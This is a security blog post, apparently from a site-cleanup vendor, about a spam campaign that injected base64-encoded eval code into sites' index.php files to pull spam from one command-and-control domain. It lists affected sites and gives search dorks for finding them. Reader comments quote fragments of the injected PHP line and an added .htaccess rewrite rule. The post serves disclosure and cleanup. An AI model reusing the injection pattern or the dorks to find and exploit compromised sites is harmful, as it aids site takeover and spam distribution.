More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Yes, that’s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg tadalafil, viagra, etc).

Just some of the affected sites:

www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
summits.aberdeen.com
www.greenway.org
www.oldlife.org

Finding them on Google is pretty simple as well: inurl:.org ” 5mg tadalafil” or you can also search for: “http://www.google-traffic-analytics.com” “Warning: file_get_contents” which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.

As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.

We will post more details when we have them.


Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • marc

    thanks for this post! I’m working on the brooklynwaldorf.org website and i just deleted several php files from the root directory (c.php, l.php, cart.php, etc.) and a load of files in our img directory. Wondering if there is anything else to do, but wait and see if our search results recover?

    I’m not sure that I understand the connection to google-traffic-anylitics.com – do you think there are any specific fixes to do here? So far, I’ve only deleted files and changed the ftp password…

  • Eobyte

    My website was being redirected to google-traffic-anylitics.com. They had added a line to my index.php that started with “if($_SERVER[base64_decode” and continued on with a bunch of junk. it was on line 2. I restored the original file but probably could have just deleted that line. Additionally, in my root folder, the file .htaccess had one line added in the middle of the file. It read “RewriteRule ^(p=.*)$ index.php?$1″. My site is back to normal but I don’t yet know how to prevent it again. I hope this helps.

Share This